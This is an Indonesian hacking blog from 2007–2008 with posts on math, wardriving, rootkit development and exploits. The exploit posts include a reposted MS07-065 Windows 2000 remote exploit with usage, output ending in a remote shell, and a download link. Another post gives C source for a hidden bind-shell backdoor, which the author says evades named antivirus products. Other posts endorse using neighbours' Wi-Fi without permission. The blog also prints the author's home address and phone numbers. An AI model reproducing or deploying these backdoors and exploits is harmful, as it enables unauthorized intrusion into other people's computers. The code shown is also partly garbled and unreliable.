Wednesday, January 2, 2008

Pembuktian 0 Faktorial = 1

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Pernah iseng nanya ga ke guru matematika Anda tentang pembuktian dari 0! (nol faktorial)! Gw yakin klo guru Anda pintar, pertanyaan Anda akan dijawab dengan lancar. Tapi klo ngak, kemungkinan besar Anda akan dimarah karena tidak mau percaya kata guru.


Sebenarnya Anda bisa saja mengalahkan guru Matematika Anda berdebat mengenai masalah ini. Gw sendiri pernah nanya guru Matematika gw,,,,,,eh anehnya dia ga tau jawabannya padahal ini masalah gampang.

Mo buktinya......

Intinya bahwa n! = n * (n-1)!.......bner ga?

Coba aja 5!
= 4 * 3!= 4 *3 *2 *1.

Nah klo aja n-nya diganti sama satu.......1! = 1 * 0!.....truz pake ilmu aljabar biasa....

0! = 1! /1 = 1/1 = 1........-> nah ketemukan jawabannya.......sekarang Anda bisa puas menang berdebat dengan guru Matematika Anda...



Read more...

Thursday, December 27, 2007

Hack 0x09 : Wardriving di Tengah Mataram Part 1

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Hari ini gw nemenin bokap gw beli memory SO-DIMM untuk laptopnya. Kami membelinya di toko Medina Software, Mataram. Nah, sepulangnya dari sana, bokap mampir dulu ke UD. Prisma untuk fotokopi berkas-berkas untuk pekerjaannya.....dan gw harus melakukan pekerjaan yang paling gw ga suka : MENUNGGU!! Kebetulan, gw liat laptop nyokap nganggur, gw nyalain dan memutuskan untuk ngelakuin wardriving sambil menunggu bokap keluar dari tempat fotokopi.


Gw kaget sekali kalo ada 8 AP (infrastructure wirless networks) di tengah kota Mataram!!! Ternyata WiFi sudah menjamur dimana-mana!!! He...he...tetapi dengan semakin banyaknya wireless networks, berarti semakin banyak internet gratisan yang bisa kami dapatkan (^_^). Walaupun melanggar etika hacking (biasa topic kesukaannya si PIRUS sama AMORY), menembus jaringan wireless tanpa sepengetahuan orang, itu amat mengasikkan, apalagi kalo dapet jaringan yang bandwithnya besar (kya Dikpora-NTB di daerah kami)!!!

Kebetulan gw udah nginstall beberapa tool hacking di kompie bokap, walaupun ga lengkap-lengkap amat sih, antara lain Network Stumbler sama Metasploit Framework 3. Gw sebenarnya butuh beberapa tool lagi kya Kismet, Aircrack, dan Angry IP Scanner.....dan....ah tidak!!!!!!!....gw lupa lagi untuk membeli Wireless Injection Adapter....oh no......ga bisa crack jaringan wireless yang dilindungi enkripsi WEP (sebenarnya bisa sih tapi ampe botak nunggunya)....tp ah ga apa....gw masi bisa scanning APs yang ada di Mataram. Moga aja info ini berguna bagi hacker-hacker yang ada di Mataram atau di luar Jawa yang sedang di Mataram.........lumayan klo ga punya uang untuk internetan...bisa langsung ngenet di tengah jalan...hahahahaha......

Ok, wardriving dimulai. Gw mulai jalanin Network Stumbler di depan tempet fotokopi itu dan inilah hasilnya.

Ini adalah grafik signal dari AP warnet 5jari (kebetulan letaknya sekitar 15 m dari tempat saya wardriving).....

Ini adalah grafik sinyal Wifi dari amikom Mataram......

Ini adalah grafik sinyal Wifi dari Cakrawala Net........

Ini adalah signal dari AP Omni-Lombok2.....

Ini adalah sinyal dari AP Grid-Lombok3.......kami mendapati bahwa sinyal ini paling tinggi di antara semua AP yang ada di Mataram. Kami tidak tahu letak pasti dari AP yang memancarkan sinyal Grid-Lombok3, tapi yang jelas sumber sinyalnya deket dengan sekolah kami.

Ini adalah sinyal dari wireless network yang dimiliki oleh Dikpora-NTB. Kebetulan sekali Dikpora-NTB terletak di sebelah sekolah kami, dan kami sudah menyelidiki bahwa kecepatan internetnya sangat cepat......

Nah, itulah sekilas dari wardriving pada hari ini. Bokap dah keluar dari tempet fotokopian, truz kita diajak ke Mall deh!! Kebetulan di Mall terdapat hotspot gratisan milik Telkom....ntar gw selidiki aaaahh......oh ya bro....tunggu aksi gw selanjutnya...ha..ha...ha (^_^)



Read more...

Wednesday, December 26, 2007

Hack 0x08 : Riskware Detected in Vista Transformation Pack 7

Berikut ini adalah screenshot dari pendeksian Pskill.exe oleh F-Secure Client Security pada saat Vista Transformation Pack 7 diinstall. Pada saat gw mengeksekusi Pskill lewat command line tertulis dibuat oleh System Internal. Penggunaan Pskill.exe oleh Vista Transformation Pack 7 masih belum jelas, tetapi sepertinya digunakan untuk mematikan process sistem.



Kenapa VTP perlu melakukan Terminate pada process sistem? Masi ingatkah pada HANDLE (lihat MSDN tentang HANDLE). Pada saat process masih berjalan, process masih memiliki HANDLE terhadap berbagai macam file. Kalau saja Anda melakukan deletion pada file yang diperlukan oleh process, maka sebuah kotak dialog warning akan keluar. Nah program seperti VTP yang akan merubah user interface windows tentu perlu untuk mengubah resource yang ada pada shell windows. Kalau VTP tidak menghentikan processnya, kemungkinan besar user interface tidak akan dapat diubah karena resource filenya tidak dapat di repace. Hal inilah yang mendasari kenapa VTP perlu menyertakan PSkill.exe di dalam executable packagenya.


Read more...

Tuesday, December 25, 2007

Rekomendasi Buku Komputer

Judul buku : Pemrograman Jaringan Internet dengan Visual C++
Pengarang : Agus Kurniawan
Penerbit : Elex Media Komputindo
Tahun Terbit : 2002

Banyak orang mengetahui internet, bahkan internet bukan merupakan teknologi baru, tetapi sudah berkembang menyeluruh di pelosok jagad raya ini. Dengan banyak kepentingan dan misi, internet melaju dengan cepatnya bagai air hujan dari langit. Situs-situs pun banyak bermunculan dengan menyajikan banyak ragam informasi dan diiringi dengan munculnya teknologi server, contohnya Internet Information Service (IIS) milik Microsoft dan Apache Web Server yang berbasis OpenSource.


Untuk melakukan koneksi melalui jaringan internet, diperlukan sustu media interface. Dengan media interface ini kita dapat melakukan koneksi dengan dunia luar. Buku ini membahas dengan mendetail tentang cara melakukan pemrograman pada jaringan internet. Adapun beberapa bahasan menarik yang terdapat pada buku ini adalah cara menciptakan program chatiing client dan server (contoh program client adalah Yahoo Mesengger dan servernya adalah Yahoo Server).

Bagi seorang hacker, internet sudah seperti surga. Siapapun yang menguasai pemrograman jaringan, dialah sang penguasa cyber world. Rata-rata semua program yang digunakan oleh para hacker bebasis jaringan internet, contohnya remote buffer overflow exploit (RPC DCOM /KAHT), bots (IRC bot, spybot), trojan (BO2K, sub7 legends, netbus), rootkits (Hacker Defender, FU, Vanquish), dan internet worms (Codered 1,2, Sasser, Blaster, MyDOOM, Melisa, I Love U). Buku ini membahas dasar-dasar pemrograman jaringan yang diperlukan untuk membuat berbagai malware di atas.

Trus kenapa harus menggunkan Visual C++? Tidak selamanya C++ harus digunakan, dengn bahasa pemrograman Assembly, Basic, Java, atau Pascal-pun, sebuah program berbasis jaringan internet dapat terbentuk. Namun penggunaan bahasa C++ dinilai OOP (pemrograman berorientasi objek) dan memiliki kekuatan yang sama seperti bahasa pendahulunya yaitu C (Linux dan Windows dibuat dari C karena portabilitas dan kecepatannya). Oh ya, tidak selamanya Visual C++ harus digunakan. Penggunaan DevCpp, MinGW Studios, atau GCC juga tidak apa-apa. Buku ini juga mencakup dasar-dasar algoritma yang diperlukan untuk membangun sebuah program berbasis jaringan, sehingga Anda tidak perlu khawatir dengan masalah lain compiler, lain source code.

Walaupun penuh dengan berbagai kelebihan, buku ini juga disertai beberapa kekurangan yaitu antara lain file source codenya sudah berada di dalam disket yang ter-embed dalam pembelian buku. Ini sangat disayangkan karena kapasitas disket yang teramat kecil, relatif terhadap CD ataupun DVD.

Penulis memberikan nilai 9 dari nilai sempurna 10 untuk buku ini. Buku ini adalah sebuah terobosan baru untuk literature pemrograman jaringan C++ yang berbasis jaringan internet (kebetulan gw suka banget sama C++…he….he…)



Read more...

BitDefender Beta Testing Winner

From: "Carmen MAIEREAN" <cmaierean@bitdefender.com>To: "'Daps Keren'" <dapskeren@yahoo.com>Subject: RE: BitDefender v10 Beta campaignDate: Tue, 22 Aug 2006 11:56:28 +0300





Dear Dendi Suhubdy,

We are happy to have you in our Beta testing team. Your effort made a difference and helped us improve our product. Thanks for sending me the mailing details. We will contact you to inform you of the day when you should receive the prize. I expect it to be no later than the end of the following month.

Regards,
Carmen.


From: Daps Keren [mailto: dapskeren@yahoo.com ] Sent: 22 august 2006 01:12To: Carmen MAIEREANSubject: Re: BitDefender v10 Beta campaign

Dear Carmen Maierean,
Thank you for listing me as a trusty beta tester. I am really proud to be one of the winners for BitDefender Beta 10 Internet Security Campaign. I didn't expect to win, because I haven't got any experience in computer security yet and there are many computer analyst and security expert following the same contest. So I though my probablity to win is little.
My focus to follow the contest is to make BitDefender even better. We all hope that BitDefender becomes the best internet securer for computer home users. I will always be BitDefender Beta Testers Team from now on.
However, I am just a 14 year old teenager who is really interested in computer programming (especially Visual C++ 2005). I live in Indonesia and my postal and home address is:
Dendi Anugerah Pratama SuhubdyJl. Irian no. 5 Perumahan Gunungsari Indah Mataram NTB Indonesia 83351Telp. +62-370-633412HP. +628123707342
Thank you for your kind information. I look forward to hearing from you soon as possible.
"Viva Bidefender"
Best regards,

Dendi A.P. Suhubdy


Carmen MAIEREAN <cmaierean@bitdefender.com> wrote:


Hello,
We are proud to inform you that you are one of the BitDefender v10 Betacampaign winners. Your input has been of great value and helped us build abetter product. We hope to have you as part of our Beta testing teams fromnow on. Thanks for helping us!
Your efforts have landed you with one of the prizes, consisting in an iPOD Shuffle and a BitDefender Internet Security v10 license which willbe sent to you via courier.
Please provide us with a valid mailing adress, so we can ship your prize toyou.
Kind regards,Carmen MAIEREAN

Product Manager - BitDefender Desktop Products

SOFTWINData Security Division

e-mail: cmaierean@bitdefender.com

phone: +40 (21) 233 07 80 130

fax: +40 (21) 233.07.63Bucharest ,

ROMANIA

http://www.bitdefender.com/

http://www.softwin.ro/


Read more...

Monday, December 24, 2007

Hack 0x07 : Melihat Sekilas Windows DDK

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Windows DDK adalah development enviroment untuk membuat device driver bagi sistem operasi windows......Kalau Anda kepengen jadi rootkit developer, adalah keharusan untuk memiliki WinDDK. Nah kalau Anda belum pernah melihat WinDDK....selamat melihat deh......




Ini adalah screenshot pada saat gw sedang mencompile atau build sebuah rootkit yang cantik.



Read more...

Hack 0x06 : Random Number Generator

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Random number generator (RNG) atau pembangkit bilangan acak, kerap kali diimplementasikan di dalam berbagai algoritma kriptografi. Contohnya saja pada algoritma kriptografi Deffie-Helman yang memerlukan bilangan prima sebagai input. Nah, cara yang paling efektif untuk mendapatkan suatu bilangan prima acak adalah dengan cara melakukan pembangkitan bilangan acak kemudian mengetes apakah bilangan yang dibangkitkan itu berupa bilangan acak atau tidak. Sekarang pertanyaannya adalah……apa algoritma untuk melakukan pembangkitan bilangan acak tersebut?


Yupzzz, Anda dapat menggunakan rand() atau Math.Random() pada C++ atau System.Random pada C# (red. C sharp) atau java.util.Random pada Java. Namun, jika Anda memeriksa algoritma yang digunakan oleh fungsi-fungsi tersebut, Anda akan menemukan bahwa itu adalah RNG yang lambat…..masih ada cara untuk mempercepatnya beberapa CPU clock cylces…lagipula baru-baru ini ditemukan security flaw pada fungsi rand() sehingga bilangan acak ini dapat dibangkitkan kembali (artinya tidak benar-benar acak) dan ini merupakan ancaman yang serius untuk dunia kriptografi.

Kalau Anda adalah orang yang haus akan ilmu hacking dan matematika diskrit…….inilah jawabannya……..

Algortima pertama adalah R250/5231 yang diciptakan oleh Kirkpatrick dan Stoll yang dipublikasikan di A Very Fast Shift-Register Sequence Random Number Generator, J. Computational Physics, vol 40, pp. 517-526.

Algoritma yang kedua adalah Mersenne Twister yang diciptakan pada tahun 1996 oleh Matsumora dan Nishimura.

Source codenya dapat di compile dengan gcc v3.3…….atau kalau Anda benar-benar kreatif, ubahlah source code ini sesuai dengan keinginan Anda……tetapi jangan lupa pada kontribusi orang-orang yang menciptakan algoritma ini. Upzzzzzzzz, gw lupa kalau source code java dan C#nya juga ada. Berikut linknya dari semua source codenya.



Read more...

Friday, December 21, 2007

Hack 0x05 : New Exploit (22-12-2007) for Windows 2000

Oleh Dendi Suhubdy A.K.A Cron of NuLL


******** Microsoft Message Queue POC exploit ( MS07-065 )**********

Mario Ballano - (mballano~gmail.com) - http://www.48bits.com

Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org

*********************************************************************

* Original Advisory:

http://www.zerodayinitiative.com/advisories/ZDI-07-076.html

* Microsoft Bulletin :

http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx

* CVE Code: CVE-2007-3039

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039

* Timeline:

No naked news this time, just rum and whiskey

* Additional information:

From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports for MQ 2101,2103,2105

HSC of course http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html

Dave´s unmidl http://www.immunitysec.com/resources-freesoftware.shtml

* How to compile: Call your favorite SetEnv.Cmd from microsoft SDK and then exec nmake.

* Note: There are several rpc ports to trigger the overflow. If you hit a system then

looks like you´ll need to send the exploit twice or specify another port (-p ) to exploit it again.

There is a chance that offsets are invalid for windows 2000 server (only spanish win2k advanced server was tested)


Adjust them if needed.

Usage:

C:\Programación\MessageQueue>MessageQueue.exe

--------------------------------------------------------------

Microsoft MessageQueue local & remote RPC Exploit code

Exploit code by Andres Tarasco & Mario Ballano

Tested against Windows 2000 Advanced server SP4

--------------------------------------------------------------

Usage (cara penggunaan exploit)

MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang]

Targets:

0 (0x6bad469b) - Windows 2000 Advanced server English (default - untested)

1 (0x6b9d469b) - Windows 2000 Advanced server Spanish

2 (0x41414141) - Windows 2000 Advanced server crash

C:\Programación\\MessageQueue>MessageQueue.exe -h 192.168.1.39

--------------------------------------------------------------

Microsoft MessageQueue local & remote RPC Exploit code

Exploit code by Andres Tarasco & Mario Ballano

Tested against Windows 2000 Advanced server SP4

--------------------------------------------------------------

//contoh screen display pada saat exploit diluncurkan......

[+] Binding to ncacn_ip_tcp:192.168.1.39

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[LRPC00000414.00000001]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QMsvc$testserver]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QmReplService]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222]

[+] Using gathered netbios name: testserver

[+] Dynamic MessageQueue rpc port found (1222)

[+] Connecting to fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:192.168.1.39[1222]

[+] RpcBindingFromStringBinding success

[+] Trying to fingerprint target...

[+] Fqdn name obtained from netbios packet: testserver.local

[+] Remote OS Fingerprint (05.00)

[+] Remote Host identified as Windows 2000

[+] Sending POC Exploit code to QMCreateObjectInternal()

[+] Try to connect to remote host at port 4444 for a shell

C:\>nc 192.168.1.39 4444

Microsoft Windows 2000 [Versión 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32> ///BRAVOOOOOOOOO, THE VIESTA BEGINS HERE....segala kemungkinan serangan selalu terbuka!!!!!!!!!!!

Special thanks to Anres Tarasco and Mario Ballano.........

Source code here ok........

http://www.milw0rm.com/sploits/2007-MessageQueue.zip

Kalau Anda memiliki kemampuan programming, ada baiknya Anda mencoba menganalisa source codenya, tapi kalau tidak dan Anda ingin sekali mencoba mengusai kompie Win2k, Anda tinggal mengcompilenya dengan masuk command line trus ke directory active source code, ketikkan “nmake” diikuti dengan pencetan enter (he…he..=)))...…jangan lupa Anda harus menginstall Visual C++ untuk mengcompile codenya....

Cheers and happy exploiting.........



Read more...

Ga Sempet Ngupdate Blog

He…he…..teman-teman pengunjung blog yang saya cintai (eisleh………). Selama beberapa hari xphreak team ga sempet ngupdate blog ini karena kami sedang ujian semester ganjil di sekolah kami, yaitu SMA Negeri 1 Mataram.

Maka dari itu, sebagai kompensasi, kami akan berusaha mengupdate blog ini dengan artikel-artikel terbaru yang tentunya HOT untuk dibaca.

Trims y.....

Cron of NuLL

xPhreak Technologies


Read more...

Saturday, December 8, 2007

Hack 0x04 : Spawn CmdShell (Teknik Bind)

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Pada kesempatan ini saya akan membahas suatu teknik pembuatan backdoor menggunakan teknik cmd spawn. Nah pasti pembaca bertanya-tanya, apasih istimewanya teknik cmd spawn ini? Udah ada ribuan Remote Administration Tools yang jauh lebih keren, kayak Back Orifice 2000, Subseven, Amitis, Netbus, dll (kalau namanya di daftar halaman ini tak cukup). Cukup dengan BO2K, kita bisa melakukan ribuan hal ke computer orang lain. Mulai dari hijack mouse dan keyboardnya, membuka semua file, mengutak-atik registry, mengendalikan process, live-keylog, bahkan chatting dengan victim juga ada. Nah alasan utama saya memakai spawn cmd shell adalah karena teknik ini begitu simple sehingga semua jenis vendor komputer security tak menaruh signature file khusus untuk mendeteksi jenis backdoor ini.


Saya telah melakukan test dengan backdoor ini beberapa jenis proteksi antivirus dan antispyware yang beredar selama ini, contohnya: McAfee Antivirus + Antispyware (Enterprise Security 8.5i), Norton Antivirus, Norman Virus Control, Avira (Antivir Personal Edition Classic), Kaspersky Internet Security, F-Secure Client Security, AVG Antivirus (Free, Personal, dan Enterprise).Oh ya, cmd spawn ini juga digunakan di dalam shellcode exploit

Teknik spawn cmdshell itu amat sangat simple. Backdoor ini hanya melakukan proses pembukaan koneksi (bind) pada port tertentu dan ketika ada koneksi yang masuk, maka cmd.exe dari computer remote dimiliki sepenuhnya oleh sang penyerang.

Saya menciptakan backdoor ini dengan bahasa C dan saya compile dengan compiler Visual C++ 6.0. Saya lebih menyukai memakai bahasa C daripada bahasa Basic karena ukuran maupun kecepatan executable menjadi lebih baik. Backdoor ini hanya berukuran 5.05 KB, sebelumnya ada optimalisasi berukuran 129 KB. Setelah optimalisasi oleh compiler dengan small executable maka backdoornya menjadi 29 KB. Setelah menambah beberapa baris kode lagi maka exenya jadi 5.05 KB (sebenarnya bila memakai assembly exe ini bisa kurang dari 1 KB). Akhirnya saya menambahkan kompresi UPX sehingga ukuran exe jadi lebih kecil lagi.

Ok bro, di bawah ini adalah source code dari program saya ini. Happy coding!!! Inget bro ini untuk 1 kali konek saja, tetapi jika mau digunakan untuk konek berkali-kali, masukkan subrutin accept() di dalam loop tak hingga (while 1) dan untuk proses send menggunakan _beginthread( ) atau AfxBeginThread( ).

======================================================================
spawn.h (precompiled header) -> berfungsi untuk memperkecil ukuran executable

#ifdef NDEBUG
#pragma optimize("gsy",on)
#pragma comment(linker,"/RELEASE")
#ifdef _MERGE_RDATA_
#pragma comment(linker,"/merge:.rdata=.data")
#endif // _MERGE_RDATA_
#pragma comment(linker,"/merge:.text=.data")
#pragma comment(linker,"/merge:.reloc=.data")
#if _MSC_VER >= 1000
#pragma comment(linker,"/FILEALIGN:0x200")
#endif // _MSC_VER >= 1000
#endif // NDEBUG
#pragma comment(linker,"/ENTRY:WinMain")
#pragma comment(linker,"/MERGE:.rdata=.data")
#pragma comment(linker,"/MERGE:.text=.data")
#pragma comment(lib,"msvcrt.lib")
#if (_MSC_VER < style="">
#pragma comment(linker,"/IGNORE:4078")
#pragma comment(linker,"/OPT:NOWIN98")
#endif
#define WIN32_LEAN_AND_MEAN

===========================spawn.c=====================================

#include

#pragma comment(linker,"/ENTRY:WinMain")
int WINAPI WinMain(HINSTANCE , HINSTANCE , LPSTR ,int )
{
STARTUPINFO si;
struct sockaddr_in sa;
PROCESS_INFORMATION pi;
int s
WSADATA HWSAdata;
WSAStartup(0x101, &HWSAdata);
s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);
sa.sin_family = AF_INET;
sa.sin_port = 0x901F; // (USHORT)htons(8080);
sa.sin_addr.s_addr= 0x00; // htonl(INADDR_ANY);
bind(s, (struct sockaddr *) &sa, 16);
listen(s, 1);
s= accept(s,(struct sockaddr *)&sa,NULL);
si.cb = sizeof(si); // 0x44;
si.wShowWindow = SW_HIDE; // 0x00
si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES; // 0x101
si.hStdInput = si.hStdOutput = si.hStdError = (void *) s;
si.lpDesktop = si.lpTitle = (char *) 0x0000;
si.lpReserved2 = NULL;
CreateProcess( NULL ,"cmd",NULL, NULL,TRUE, 0,NULL,NULL,(STARTUPINFO*)&si,π);
}
==============================================================


Read more...
Template by - Abdul Munir | Daya Earth Blogger Template